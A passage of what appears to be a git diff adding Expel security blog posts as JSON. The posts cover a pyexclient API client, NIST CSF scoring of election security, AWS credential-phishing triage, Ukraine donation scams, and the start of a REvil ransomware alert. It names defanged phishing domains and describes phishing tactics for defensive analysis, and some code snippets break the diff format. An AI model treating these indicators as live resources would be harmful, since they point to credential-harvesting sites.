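# Minimal sketch of a first pyexclient session. The WorkbenchClient constructor
# mirrors the pattern in the pyexclient docs; the attribute names printed below
# (short_link, title) are assumptions for illustration -- confirm them in the docs.
from getpass import getpass

from pyexclient import WorkbenchClient  # pip install pyexclient

xc = WorkbenchClient(
    "https://workbench.expel.io",
    username=input("Workbench username: "),
    password=getpass("Workbench password: "),
    mfa_code=int(input("MFA code: ")),
)

# Resources are iterable, so listing recent investigations is a one-liner.
for investigation in xc.investigations:
    print(investigation.short_link, investigation.title)
```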
With the release of pyexclient we\u2019re including: Snippets : we\u2019re releasing 25+ code snippets that give, in a few lines each, examples of how to accomplish a specific task. Want to create an investigation or update remediation actions? We\u2019ve got you. Scripts : In addition to the snippets, we\u2019re releasing some fully featured scripts that contain larger use cases. The three we\u2019re releasing today are: Data Export via CSV : Want to manipulate alert data in your favorite business intelligence (BI) analytics tool? This script provides an example of how to export alert data and fields as a CSV over a specified time range. Poll for new Incident : Want to build automation that runs when bad things are detected? This script provides an example that polls the API for new incidents. It also allows for filtering on keywords. Sync with JIRA : Want to expose artifacts from decisions our analysts make in Expel Workbench to your internal case management system? This script provides an example of syncing Expel activities that require customer action to a Jira project. This includes: Investigations assigned to the customer Investigative actions assigned to the customer Remediation actions assigned to the customer Comments added to an investigation Notebook : Want to see what change point analysis or off-hours alerting looks like in your environment? We\u2019ve got you. We\u2019re releasing a notebook that implements the following: ipywidget to Auth to Expel Workbench (feel free to re-use this!) Overview of alerts with some basic stats like number of alerts, percentage done without customer involvement and off-hours alerting (you can configure timezone and working hours) Heatmap of alert arrival times Time-to-action by severity w/ bar chart Change point analysis for Expel Alert time series! Here\u2019s a screenshot of change point analysis available in the notebook: Example alert time series w/ change points As we\u2019ve been working with our customers to protect and build out their cloud environments, we\u2019ve been impressed with the raw power that can be achieved with composing APIs and configurable components. Work that used to require a huge team to customize enterprise software is now just a script away. We\u2019re really excited to get this client in the hands of our customers and partners, and see what innovative ways they leverage the information available in Expel Workbench. Interested? We hope so! Getting started is as easy as \u201cpip install pyexclient\u201d. Head over to our pyexclient documentation page for more details." +} \ No newline at end of file diff --git a/applying-the-nist-csf-to-u-s-election-security-expel.json b/applying-the-nist-csf-to-u-s-election-security-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..5770369237e3a4fe554df7bdd4a822e07e152603 --- /dev/null +++ b/applying-the-nist-csf-to-u-s-election-security-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Applying the NIST CSF to U.S. election security - Expel", + "url": "https://expel.com/blog/applying-nist-csf-to-election-security/", + "date": "Sep 24, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Applying the NIST CSF to U.S. election security Security operations \u00b7 10 MIN READ \u00b7 BRUCE POTTER \u00b7 SEP 24, 2019 \u00b7 TAGS: Framework / Managed security / NIST / Planning / Vulnerability If you\u2019ve worked in security for any length of time, chances are good that you\u2019ve heard of the NIST Cyber Security Framework (CSF) . 
It\u2019s a useful tool for helping orgs increase their overall resilience and response to cyber threats. I\u2019ve personally used the CSF to guide cybersecurity activities in orgs of all sizes, ranging from startups and local governments to Fortune 500 companies. Even well-known tech brands like Amazon and Microsoft use the CSF to understand where they are and where they want to be with respect to cyber risk. Given the utility of the CSF, I\u2019d argue that it\u2019s not only useful for corporations \u2014 it\u2019s helpful for guiding security activities around processes like our national elections. As we march toward November 2020, there\u2019s continued dialogue around how to secure our democracy. That\u2019s because our election systems have been under attack by various adversaries ever since the United States was formed. Over the last few years, though, these attacks have come into sharp focus but the collective response to those attacks hasn\u2019t. Is election security an area where the CSF could lend some clarity to the \u201cas is\u201d and \u201cto be\u201d of the U.S. election infrastructure? I vote yes. (Pun fully intended.) The 3 challenges for state and local election operations Most of the mechanics of our elections process \u2014 like setting up ballot boxes or electronic voting machines, staffing the polls and recording and reporting votes \u2014 is managed at the state and local government level. So for the purpose of this CSF exercise, I\u2019ll focus on assessing state and local election operations at a high level. The three biggest challenges that these orgs face when it comes to election security are: Lack of standardization: Applying the CSF to election security isn\u2019t easy for many reasons \u2014 one of the biggest being the fact that there\u2019s no single organization that\u2019s in charge of U.S. elections. Unlike performing a CSF assessment on a bank or a car company, the election system isn\u2019t a monolithic organization with one executive team and one board of directors. Our election systems are governed (and funded) by various U.S., state and local laws and operated by thousands of local agencies and organizations around the country. This diversity in oversight means that any specific finding or recommendation made by any of those entities would need to be implemented by those thousands of organizations \u2014 all with varying degrees of cybersecurity knowledge and budgets. No small task. Voting infrastructure: The next challenge is the infrastructure itself. Localities run elections differently \u2014 there is no \u201cone size fits all\u201d approach that\u2019s taken by every single city, county and town throughout our country. Some use paper ballots at the voting booth, some go electronic only and some use both. Some have voter registration rolls stored on modern, cloud-based systems while others still use mainframes. Some have money for technology and security improvements but many don\u2019t. Think about running a penetration test on hundreds of different systems that have a common function but no common architecture. How would you develop recommendations after that exercise? Training for election volunteers: Lastly, many state and local governments provide training for the volunteers who show up to help you cast your vote \u2014 but just like the overall elections system, there\u2019s no standardization here. 
That means the election security training happening in your town might be vastly different than the depth of training happening a few towns over. Is this a hard problem? Yep. Is it unsolvable? Nope. Let\u2019s walk down the path of the CSF and see how it could apply to an important part of the election supply chain: state and local governments. U.S. Elections \u2013 Identify Looking at the NIST CSF , the first functional area is Identify. In Identify you\u2019ve got categories that deal with taking inventory of hardware and software systems, cybersecurity governance, cyber risk management and supply chain risks. Unsurprisingly, all these categories apply to securing election systems (I\u2019m hoping to quickly sway those who think election security begins at the election booth \u2014 it doesn\u2019t). Hardware and software inventories are historically complicated even for the big, seemingly tech-savvy enterprises. It\u2019s the first CSF control and arguably one of the hardest to do right, because understanding what you own and what you\u2019re running is a herculean task in organizations larger than a few dozen people. When you think of the scale of modern election systems, you might think the same is true in that case. But one thing local election boards do very well is hardware inventory. Understanding what voting systems they have and where they physically are at any given moment has been a core part of election security for as long as we\u2019ve been doing secret ballots. So while there may not be a unified hardware inventory method, there\u2019s still a concrete inventory that\u2019s well controlled. For those playing along with our NIST self-scoring tool (yeah, we have one of those and it\u2019s really easy to use \u2014 grab your own copy of the NIST CSF scoring tool here ) that\u2019s probably a 3 on the verge of a 4. Software is a different animal. Election voter rolls are run on all kinds of different systems and likely the software that runs those systems is not well inventoried (at least in many cases). Also, electronic voting systems are often a black box, so while the vendor that built the system may know what\u2019s running on those machines, the local elections boards probably doesn\u2019t. Thanks to researchers at organizations like the DEF CON Voting Village , the public now has a better inventory of what\u2019s on our voting machines. But even if the public has greater visibility into what\u2019s on the machines, that doesn\u2019t translate into election boards taking better inventory of the software on their systems. Let\u2019s score this area a 2. Another category in Identify is vendor and supply chain management. As a friend of mine says, government contracting is the land of LCTA \u2014 \u201clowest cost, technically acceptable.\u201d This applies to everything from traffic light controllers to law enforcement communication networks to voting machines. It\u2019ll come as no surprise that when you go the LCTA route, security may not be something that\u2019s a priority (if it\u2019s a consideration at all). While voting machines and voter roll systems are well regulated from a procurement perspective, there are wildly varying levels of due diligence done on the supply chain from a cyber risk perspective. Look at the state of Georgia, for example \u2014 officials purchased a voting system with known security vulnerabilities because the procurement was too far down the road and there were no perceived viable alternatives. 
In a conventional enterprise, these sorts of vulnerabilities would have stopped the procurement process cold. But in the relatively small world of government election systems, the transaction happened without a blink of an eye. I\u2019m going to rate that a 2, but trending towards a 1. U.S. Elections \u2013 Protect Next up in the NIST CSF is the Protect functional area. This part deals explicitly with security controls that are designed to protect an organization from a successful attack by an adversary. Encryption and data protection, identity and access management, training and awareness and how you operate the system are all part of Protect. Again, the level of sophistication of these categories varies depending on your locality. Let\u2019s talk about elections and encryption. The biggest forcing function for encryption with elections is the voter rolls and associated personal data. Upcoming laws like the California Consumer Privacy Act (CCPA) will likely force officials to create a regulatory framework that requires encryption for voter rolls. And depending on how broad the definitions are in laws like the CCPA, officials might need to encrypt the vote itself as well since it\u2019s arguably one of the most personal pieces of information someone gives away. Encrypting it makes perfect sense. We don\u2019t have concrete evidence of how much data is or is not encrypted currently in modern voting systems, so for now we\u2019ll have to label this as \u201cunknown\u201d in our NIST self-scoring tool. Lastly, Protect deals with conventional IT security controls such as change management, vulnerability management and auditing. The quality (or lack thereof) at the local level impacts the assurance of voter registration rolls as well as vote tallying and results communication processes. At the state and local level, these controls are managed by a patchwork of local officials, contractors and vendors. While orgs such as the National Association of State Legislatures have guidelines on how to secure these systems, these guidelines are voluntary and compliance varies from state to state. Looking at these controls, we could score them a solid 2 with a few states trending toward a 3. U.S. Elections \u2013 Detect The Detect functional area of the NIST CSF is the sweet spot when it comes to cybersecurity operations. This is where the bad guys are caught doing bad things. Getting a good score in Detect typically means that an org has good security signals being generated by various security tech. From there, analytical technology and humans working in a security operations center are responsible for identifying malicious activity and notifying the appropriate parties. The question here is what state and local governments have to do when it comes to: Security technology installed on endpoints and networks Security signal generated by these technologies Aggregation and analysis capabilities SOC analysts and escalation paths The distinction between what\u2019s required for the overall voting ecosystem (that includes voter registration systems and vote reporting systems) versus what\u2019s required to secure just the voting machines is striking. While voter registration and vote reporting systems are essentially enterprise systems that can have commodity security technology installed for detection purposes, electronic voting systems are basically embedded systems. They have specialized hardware and software that requires vendor interaction and specialized processes to update. 
Plus, voting systems are offline for most of their lives and are generally not connected to a network even when they\u2019re in use. Getting real-time telemetry off of them with software that most other security and analytic systems can understand is highly unlikely (and may put the system in more danger versus less). So for many of the Detect subcategories, scores will be pulled down due to the nature of offline voting systems in general. Some of the slack has been picked up by organizations like CYBERCOM . During the 2018 midterm elections (and to some extent in the 2016 elections as well) CYBERCOM monitored it\u2019s SIGINT assets as well as worked with various public and private sector entities to monitor election night activities for bad actors. This point-in-time monitoring is useful for detecting threat actors that may be attempting to interfere with the voting itself, but doesn\u2019t necessarily address attacks against other parts of the ecosystem. So for subcategories like Detect \u2013 Continuous Monitoring 1: \u201cThe network is monitored to detect potential cybersecurity events,\u201d most states would score a 2. U.S. Elections \u2013 Respond The Response Functional Area is a part of the NIST CSF many of us hope to never get to. If you\u2019re responding to an incident, then a bad thing already happened and you\u2019ve got to deal with it. The reality for any enterprise is that you\u2019ll eventually have to respond to security incidents. For election systems, we know from public reports that they\u2019ve been under attack for years. And some of these attacks have been successful, unfortunately. We should expect future elections to have similar issues. The good news is that because of past events, we see lots more coordination between various stakeholders than we\u2019ve ever seen before. The federal civil and military agencies are actively communicating with state and local authorities. So for RS.CO-3 (\u201cInformation is shared consistent with response plan\u201d) and RS.CO-4 (\u201cCoordination with stakeholders occurs consistent with response plan\u201d), scores are probably at least a solid 3 with some localities trending toward a 4. But how good is each plan itself (RS.RP-1)? That likely varies dramatically based on how far down into the process you are. While states have response plans at a strategic level, once you get to the local precincts, IR processes for local cyberattacks start to disappear. The saving grace is that mechanically poll workers are looking for anything out of the ordinary and run their local precincts according to a common set of procedures. So while there\u2019s no plan per se at that level, there are compensating controls that somewhat act as a plan. Score? I\u2019ll give them a 2, trending towards 3. And how well do we understand the impact (RS.AN-2)? That\u2019s been a matter of national debate for the last several years. Regardless of the facts around specific incidents, it\u2019s almost impossible for outsiders to find truth due to ideological and partisan differences. The current mechanisms for discovering and communicating the impact of cyber incidents is unfortunately woefully inadequate, resulting in a score of 1. U.S. Elections \u2013 Recover Finally, we get to the shortest Functional Area of the CSF: Recover. Once all is said and done, how well do you get back to normal operations? How well do you handle the public relations aspect to deal with the event that occurred? 
And are you able to refine your recovery activities based on what you learned from the last incident? Much like Respond, past events help drive improvements in this functional area. States have practices on recovery operations now and are able to (in some cases) restore services in a timely and accurate way. There are plenty of situations in which data is still lost \u2014 it takes diligence and attention to get recovery operations to be smooth and easy to execute. Score on recovery planning? I\u2019ll give this area a 2. Public relations is a large part of recovery (RC.CO-1 and 2). Again, like Response, recovery public relations relating to the election system isn\u2019t like public relations for a normal enterprise. The country is polarized and simply saying \u201cEverything is back to normal!\u201d may not be enough to satisfy most voters. Transparency is required and that isn\u2019t a strong trait of current election recovery operations. We\u2019ll get there \u2026 but for now, we\u2019re still at a 2. Next steps This was a quick, back-of-the-napkin attempt to apply the CSF to U.S. elections. Certainly we\u2019d benefit from a detailed analysis \u2014 using the CSF as the driving framework \u2014 of election systems in all 50 states. Shining a bright light on what\u2019s working and what needs help in our election systems would assist in driving funding decisions at all levels of our democracy. With that kind of common assessment, the public could make apples-to-apples comparisons between different systems and architectures in different states. We\u2019d be able to monitor change over time and measure the progress being made by those responsible for the integrity of our elections. And over time, the public would put more trust in our election system. Who would do this and where would the funding come from? That\u2019s a question that a blog post can\u2019t answer. However, I hope that what this post does provide is evidence that the NIST CSF offers value in systems of all shapes and sizes, including the national election systems. Security for the broader election supply chain That said, remember that local agencies and organizations that are leading these election operations are only part of the election security supply chain. Many people\u2019s perceptions of the election process go something like this: They go vote at their local polling place, the magic happens and results show up on their nightly news a couple hours later. But the system is much larger than that \u2014 elections are about far more than the voting machine. Consider voter registration efforts and election rolls, the campaigns and special interest groups that disseminate information about candidates and issues and the reporting and validation of the results. If you consider all those distinct parts of the supply chain, there are plenty of opportunities for attack and the adversary can be lurking almost anywhere, whether that\u2019s at a polling place or behind a Twitter account. While state and local orgs play a role in a larger effort to protect our national elections, a NIST CSF-style assessment for all 50 states would be a fantastic step forward in making our future elections more secure." 
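If you want to play with these back-of-the-napkin numbers yourself, they're easy to tabulate. Here's a small illustrative sketch (not part of our scoring tool) that rolls up the rough scores from this post and flags the weakest spot in each functional area; the labels are shorthand for the subcategories discussed above, and the Protect encryption question stays out of the math since we scored it "unknown."

```python
# Illustrative only: roll up the rough 1-4 scores assigned in this post and
# flag the weakest area in each CSF function. Labels are shorthand for the
# subcategories discussed above, not a full assessment.
scores = {
    "Identify": {"hardware inventory": 3, "software inventory": 2, "supply chain": 2},
    "Protect": {"IT security controls": 2},  # encryption was scored "unknown"
    "Detect": {"continuous monitoring (DE.CM-1)": 2},
    "Respond": {"coordination (RS.CO-3/4)": 3, "response plan (RS.RP-1)": 2, "impact analysis (RS.AN-2)": 1},
    "Recover": {"recovery planning": 2, "public relations (RC.CO-1/2)": 2},
}

for function, subcats in scores.items():
    average = sum(subcats.values()) / len(subcats)
    weakest = min(subcats, key=subcats.get)
    print(f"{function:<8} avg {average:.1f} | weakest: {weakest} ({subcats[weakest]})")
```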
+} \ No newline at end of file diff --git a/attack-trend-alert-aws-themed-credential-phishing-technique.json b/attack-trend-alert-aws-themed-credential-phishing-technique.json new file mode 100644 index 0000000000000000000000000000000000000000..7d9e0d7ee824ab33d88ba8b63d1c1ce1e276a7a5 --- /dev/null +++ b/attack-trend-alert-aws-themed-credential-phishing-technique.json @@ -0,0 +1,6 @@ +{ + "title": "Attack trend alert: AWS-themed credential phishing technique", + "url": "https://expel.com/blog/attack-trend-alert-aws-themed-credential-phishing-technique/", + "date": "Feb 1, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Attack trend alert: AWS-themed credential phishing technique Security operations \u00b7 4 MIN READ \u00b7 SIMON WONG AND EMILY HUDSON \u00b7 FEB 1, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools The Expel Phishing team spotted something \u2026fishy\u2026 recently. We came across a less common but well crafted Amazon Web Services (AWS)-themed phishing email that targets AWS login credentials. These emails have been reported in the past by security practitioners outside of Expel, but this is the first time our security operations center (SOC) encountered this technique. Now that we\u2019ve seen this tactic in the wild, we wanted to share what we learned about this attack and how our SOC analysts triage malicious emails here at Expel. What happened Expel\u2019s Phishing team reviews hundreds of emails a day and thousands of emails on a weekly basis; the vast majority of malicious emails we encounter are credential phishing attacks that are Microsoft themed. Why are they often Microsoft themed? We think it\u2019s because Microsoft and Google have dominant market share and both tech giants have highly reputable brands. Their cloud platforms and offerings are reliable cloud infrastructures, which cover most businesses\u2019 needs \u2013 like email, communications, and productivity applications. So this attack was interesting to us. Similar to Microsoft and Google, AWS is a popular cloud platform. If attackers were to obtain AWS credentials to an organization\u2019s cloud infrastructure, this can pose an immediate risk to their environment. On January 26, 2022, our customer\u2019s user submitted a suspicious email for review. We picked it up and immediately turned the email into an investigation based on some highly suspicious indicators (we\u2019ll dive into those below) that were surfaced to our analyst by one of our bots, Ruxie\u2122 . Based on these leads, we decided to dig into the submitted email for a closer look. How we triaged The way we triage emails here at Expel can be different from other managed security service providers. We use our platform, the Expel Workbench\u2122 , to ingest user submitted emails. From there, based on detections and rules created by our team, the Expel Workbench gives context for why the email is suspicious. This context provides decision support for our analysts as they review the email. That way the analyst can focus on applying what we call OSCAR (orient, strategize, collect evidence, analyze, and report), and perform analysis with decision support from our bots. We walked you through how Expel analysts use OSCAR in a previous post here . Here\u2019s what we can capture from our initial lead by applying OSCAR. By orienting , we notice that Ruxie\u2122 surfaced a suspicious link that isn\u2019t related to Amazon. 
And within the screenshot we noticed some poor grammar \u2013 there\u2019s no space in between \u201caccount\u201d and \u201crequires.\u201d We\u2019ve also noticed these bad actors are always cordial by making use of words like \u201ckindly.\u201d The image below is a screenshot of the suspicious email. Suspicious email submitted to Expel Phishing Let\u2019s strategize next! There are two common phishing tactics we see when it comes to phishing. One is suspicious hyperlinks and the other is file attachments. In this case, Ruxie informed us that there\u2019s no attachment. But there\u2019s a suspicious hyperlink that needs to be reviewed.The image below shows the suspicious link surfaced by Ruxie in the Expel Workbench. Expel Workbench initial alert Next step: let\u2019s collect evidence. Wow, these bots are really helping us out here! Without the need to download the email file and open it in an email client for analysis, our bots do all the heavy lifting for us. Here Ruxie\u2122 surfaces the URL, recognizes that there is a partial base64 string which looks to be an email address, and sanitizes that email address. Awesome! Ruxie actions in the Expel Workbench In a previous post , we mentioned how Expel managed phishing uses VMRay to analyze phishing emails. But not everyone has access to an advanced sandbox. Can you still analyze malicious emails? Absolutely! We\u2019ll show you how to do this by using free tools like a simple web browser sandbox and the built in developer tools, which is one of our favorite methods of analysis. We recommend using Browserling , as this provides you with a safe environment to analyze suspicious hyperlinks. We\u2019ll be using Mozilla and it\u2019s developer tools as the web browser in this example. Follow these steps to access the developer tools: Navigate to the malicious domain. Let the landing page load. Note that this page is convincing if you\u2019re not careful, since the threat actor has cloned the page. Fake AWS sign-in page Enter the faulty credentials: myuser22@company.com Navigate to the browser\u2019s developer tools. Mozilla developer tools navigation Here is a side-by-side comparison of the two pages. As you can see, they\u2019ve cloned the AWS login page. If a user isn\u2019t careful in reviewing, they\u2019ll fall victim to this attack. Left: Real AWS login page. Right: Fake AWS login page There are few important HTTP methods, like \u201cGET\u201d request, you can use when you\u2019re attempting to get data from a web server. But what about when you\u2019re investigating where credentials are being stored? You\u2019ll want to follow the \u201cPOST\u201d request traffic. This HTTP method is used to send data to the web server and most commonly used for HTTP authentication with PHP. After entering phony credentials we see the \u201cPOST\u201d request is storing the credentials to the same domain. Now we can scope using this indicator as evidence to identify potential account compromises. Mozilla developer tool In addition to our awesome bots (can you tell we love our bots here at Expel?), we also have automated workflows that are built into the Expel Workbench\u2122 that can help our analysts be more efficient by reducing cognitive loading for triaging emails. By running our domain gather query we observed no evidence of traffic to the malicious credential harvesting domain, which suggests no signs of compromise! Whew! 
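Ruxie pulled that email address out of the partial base64 string for us automatically, but you can do the same by hand. Here's a minimal sketch; the URL and query parameter below are hypothetical stand-ins (we're not reproducing the real indicator here), and the snippet re-adds the "=" padding that base64 strings usually lose when they're jammed into a link.

```python
# Minimal sketch: recover a base64-encoded email address embedded in a phishing
# URL. The URL and the "u" parameter are hypothetical placeholders, not the real
# indicator from this investigation.
import base64
from urllib.parse import parse_qs, urlparse

url = "https://phish.example[.]com/aws/signin?u=bXl1c2VyMjJAY29tcGFueS5jb20"  # hypothetical, defanged
token = parse_qs(urlparse(url.replace("[.]", ".")).query)["u"][0]

# Base64 copied out of a URL often loses its '=' padding; add it back before decoding.
token += "=" * (-len(token) % 4)
print(base64.urlsafe_b64decode(token).decode("utf-8", errors="replace"))
# -> myuser22@company.com (the phony address we used during triage)
```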
Last but not least, we can now record that there was no evidence of compromise in our findings as a part of the investigation. Ruxie analysis that displays any POST requests made to the fake AWS webpage across the customer\u2019s environment Although tech is great and can help us be more efficient at running down investigations related to credential harvesting, it\u2019s not always necessary and we can still achieve the same goal manually. The technique we just walked you through in this post can be applied to triaging any suspicious credential harvesting email. How you can keep your org safe AWS users are just as vulnerable to credential phishing attacks as Microsoft users. And if an AWS user falls victim to phishing emails and social engineering techniques, putting their credentials in the hands of an attacker, there\u2019s a chance you\u2019ll be dealing with a cloud breach. Here are a few ways you can remediate if your AWS account was compromised: Reset Root/IAM user credentials. Disable, delete, or rotate access keys. Audit permissions and user activity through the use of CloudTrail. Enable AWS multi-factor authentication on user accounts. We hope you found this post helpful! Have questions or want to learn more about how the Expel Phishing team works? Let\u2019s chat (yes \u2013 with a real human)." +} \ No newline at end of file diff --git a/attack-trend-alert-email-scams-targeting-donations-to-ukraine.json b/attack-trend-alert-email-scams-targeting-donations-to-ukraine.json new file mode 100644 index 0000000000000000000000000000000000000000..8ac01ae9b439fb5fb32d2cae81b7b93f9914ae39 --- /dev/null +++ b/attack-trend-alert-email-scams-targeting-donations-to-ukraine.json @@ -0,0 +1,6 @@ +{ + "title": "Attack trend alert: Email scams targeting donations to Ukraine", + "url": "https://expel.com/blog/attack-trend-alert-email-scams-targeting-donations-to-ukraine/", + "date": "Mar 24, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Attack trend alert: Email scams targeting donations to Ukraine Security operations \u00b7 5 MIN READ \u00b7 HIRANYA MIR, JOSE TALENO AND SIMON WONG \u00b7 MAR 24, 2022 \u00b7 TAGS: MDR / Tech tools As the Russian invasion of Ukraine continues, many people around the world are looking for opportunities to donate to Ukrainian relief efforts. For scammers, this presents an opportunity to prey on people\u2019s well-intentioned desire to help. Recently, we\u2019ve seen an increase in phishing emails masquerading as Ukrainian cryptocurrency and charitable apparel organizations. In this post, we\u2019ll show you what these emails look like and how to spot the tell-tale warning signs to ensure your donations are going to help those in need. It\u2019s both unsurprising and horrible that there are people out there trying to take advantage of the situation. We are not discouraging anyone from donating but, since there are bad actors at play, we do encourage people to verify their donations are going to a legitimate place to help those in need. Crypto scam emails If you\u2019re thinking about donating cryptocurrency to help victims in Ukraine, it\u2019s important to be aware of potential scam techniques before you hit \u201csend.\u201d Especially if you\u2019re prompted to donate via email solicitation, rather than seeking out a public wallet address associated with donation efforts. If you receive an email claiming to represent a charitable organization accepting crypto donations, there are some key clues to indicate whether it\u2019s genuine or not. 
The email below is a recent example of a crypto scam email: Crypto scam email Our first clue that things are amiss? The name and address listed in the \u201cFrom\u201d field. Let\u2019s zoom in a bit more\u2026 Email headers and signature field The doctor\u2019s name listed on the \u201cFrom\u201d field (Dr.Maxim Aronov), doesn\u2019t match the email address listed on the \u201cFrom\u201d field (fontbadia@). Also, the email address provided in the signature field, maximaronov40@gmail[d]com, isn\u2019t associated with the children\u2019s clinic. If we look up the email reputation for maximaronov40@gmail[d]com we can see that this address isn\u2019t linked to any social media profiles on major services like Facebook, LinkedIn, and iCloud. While this could also mean this is a new email address, it\u2019s also suspicious. Next, let\u2019s inspect the public wallet address listed in the email body. (We\u2019ve hidden the wallet address but for anyone wondering, it was an Ethereum public address.) Crypto transactions are stored on the blockchain \u2014 leaving us a nice digital footprint of transaction activity associated with a public wallet address. You can review the transaction history of a public address using block chain explorer sites like blockchain.com and Polkascan. Below is the transaction history of the public wallet address listed in the email body: Public Ethereum address transaction history What stands out? This public wallet address has recorded zero transactions. When donating crypto to Ukrainian relief efforts, be wary of public addresses with minimal transaction history and low balances. Would you buy an expensive watch from a seller on Ebay with zero transaction history? Probably a red flag, right? The same applies to crypto donations. For a comparison, the Ukraine government\u2019s (verified) Twitter account shared three cryptocurrency wallet addresses \u2014 a Bitcoin wallet address, Ethereum wallet address, and Polkadot address. Below is the transaction history for the Bitcoin public address 357a3So9CbsNfBBgFYACGvxxS6tMaDoa1P: BTC transaction history for 357a3So9CbsNfBBgFYACGvxxS6tMaDoa1P This public wallet address has recorded tens of thousands of transactions and is labeled as a \u201cUkraine Donation Address.\u201d This is a stark contrast to the transaction history of the Ethereum public wallet address listed in the email body. The bottom line? If you\u2019re thinking about donating crypto, double-check the public address and transaction history before hitting \u201csend.\u201d You can review the transaction history of a public address using block chain explorer sites like blockchain.com and Polkascan. Be wary of public addresses with minimal transaction history and low balances. Also, perform a quick Google search of the public address. If it\u2019s not linked to Ukraine crypto donation efforts, that\u2019s a tell-tale sign that something is wrong. Fake charitable apparel emails Scammers don\u2019t just target people wanting to donate. They also target people looking to \u201cshow\u201d their support. If you\u2019re thinking about buying apparel to support Ukraine, here are a couple of things to lookout for before you hit \u201cbuy it now.\u201d Here\u2019s a recent phishing email investigated by our SOC: Fake charitable apparel email Our first clue that something just doesn\u2019t feel right? The email address listed in the \u201cFrom\u201d field has no online presence according to our friends at EmailRep . 
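EmailRep is free to query yourself, by the way. Here's a minimal sketch of that lookup; the endpoint and response fields reflect EmailRep's public API as we understand it, so confirm them against the emailrep.io docs (and expect rate limits without an API key).

```python
# Minimal sketch: look up a sender's reputation the way we checked this one.
# Endpoint and response fields are our understanding of EmailRep's public API --
# verify against emailrep.io, and note unauthenticated lookups are rate limited.
import json
import urllib.request

address = "someone@example.com"  # placeholder -- swap in the (re-fanged) sender address
request = urllib.request.Request(
    f"https://emailrep.io/{address}",
    headers={"User-Agent": "phishing-triage-example"},
)
with urllib.request.urlopen(request, timeout=10) as response:
    report = json.load(response)

print("reputation:", report.get("reputation"), "| suspicious:", report.get("suspicious"))
print("linked profiles:", report.get("details", {}).get("profiles", []))
```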
Now focusing on the email body, if we were to click the \u201cClick Here to View\u201d hyperlink, that would connect our web browser to a domain hosted at u.danhramvaiqua[d]xyz. Email hyperlink For some quick context, the .xyz top-level domain has a history of domain abuse . We\u2019re in no way saying that all websites using the .xyz top-level domain lead to bad things, but used in this way \u2014 it\u2019s certainly enough to grab our analyst\u2019s attention. Let\u2019s take a look at the website reputation for u.danhramvaiqua[d]xyz. Reviewing a website\u2019s reputation is a great way to understand if a specific IP, URL, or domain name has a negative reputation or if it\u2019s been categorized as malicious. There are a number of free resources you can use. Submit the domain and review the results. It\u2019s that easy. Here are a couple of our favorites: Symantec Site Review URLVoid Talos IP and Domain reputation Webpulse Site Review classified the u.danhramvaiqua[d]xyz domain as phishing. Webpulse domain reputation results So far, we have an email address with no digital presence sending an email with a hyperlink that points to a .xyz domain that has a reputation of phishing. This is enough evidence to make the decision to either delete the email in question or forward it on to your IT team for further review. But for folks looking to go an additional step, let\u2019s take a look at what happens when we load the \u201cu.danhramvaiqua[d]xyz\u201d page in a sandbox and browse the URL as if a user visited that page. We\u2019ll use URLScan \u2014 another free online resource. URLscan provided us the effective URL (where the domain is pointing to), provided us screenshots by loading the page (which it does if the page is active), and even let us know Cloudflare issued a TLS certificate for the site on February 28, 2022. The biggest takeaway is that if a user were to click the \u201cClick Here to View\u201d hyperlink, they\u2019d be redirected to www[d]mimoprint[d]shop. URLscan results You may be asking, should I look up the website reputation for www[d]mimoprint[d]shop? Absolutely! Spoiler: It\u2019s got a bad reputation. If you\u2019re considering a donation to support victims of the crisis in Ukraine, be aware of the prevalence of scams at play to make sure your donations are actually going to help those in need. We strongly recommend using official channels to make donations and researching your options before you hit \u201csend\u201d or \u201cbuy it now.\u201d Things you can do to spot potential scam emails Before clicking on hyperlinks, hover over them and check where that URL may lead you. Report suspicious emails to your security team and avoid interacting with any unsolicited emails. Ensure your org conducts frequent security awareness training sessions and that they\u2019re adapted to current events that might be used to mislead your end-users. Make sure your org has a good security email gateway product in place for protection. Have questions about scams like these, or want to learn more about the Expel Phishing team? Reach out any time." 
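One more way to do the wallet homework before you donate: pull the address's on-chain history programmatically instead of eyeballing an explorer. Here's a minimal sketch against Blockchain.com's public single-address endpoint; the endpoint and field names are our understanding of that API, so verify them against the current docs.

```python
# Minimal sketch: check a Bitcoin donation address's history before sending funds.
# Endpoint and field names reflect Blockchain.com's public "rawaddr" API as we
# understand it -- verify against their docs. The address is the verified Ukraine
# donation address referenced above.
import json
import urllib.request

address = "357a3So9CbsNfBBgFYACGvxxS6tMaDoa1P"
url = f"https://blockchain.info/rawaddr/{address}?limit=0"
with urllib.request.urlopen(url, timeout=10) as response:
    data = json.load(response)

print("transactions:", data.get("n_tx"))
print("total received (BTC):", data.get("total_received", 0) / 1e8)  # API reports satoshis
print("final balance (BTC):", data.get("final_balance", 0) / 1e8)
# A "donation" wallet with little or no history is a red flag.
```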
+} \ No newline at end of file diff --git a/attack-trend-alert-revil-ransomware.json b/attack-trend-alert-revil-ransomware.json new file mode 100644 index 0000000000000000000000000000000000000000..bb4ccdf807e3e342959bc389c1c803accbcac30c --- /dev/null +++ b/attack-trend-alert-revil-ransomware.json @@ -0,0 +1,6 @@ +{ + "title": "Attack trend alert: REvil ransomware", + "url": "https://expel.com/blog/attack-trend-alert-revil-ransomware/", + "date": "Feb 17, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Attack trend alert: REvil ransomware Security operations \u00b7 3 MIN READ \u00b7 JON HENCINSKI AND MICHAEL BARCLAY \u00b7 FEB 17, 2021 \u00b7 TAGS: MDR Over the past week, Expel detected ransomware activity targeting law firms attributed to REvil, a Ransomware-as-a-service (RaaS) operation. In this post, we\u2019ll share more about REvil, how we detected this latest attack and what you can do to make your own org more resilient to a REvil attack. What is REvil? REvil is a well-known ransomware group operating a Ransomware-as-a-Service (RaaS) program since early 2019. Given that initial access to a target organization is the job of RaaS affiliates contracted by the core REvil group, the delivery and initial infection vectors vary. But they\u2019ve been known to include phishing, the exploitation of known vulnerabilities in publicly accessible assets and collaboration with botnet owners who sell existing infections to REvil affiliates. In recent REvil campaigns , attackers deployed a modified version of Cobalt Strike\u2019s BEACON agent to compromised systems before escalating privileges and moving laterally in the target environment. Once REvil has administrator-level privileges inside an organization, they\u2019ll deploy REvil ransomware, aka SODINOKIBI or BLUECRAB. What\u2019s new about this particular 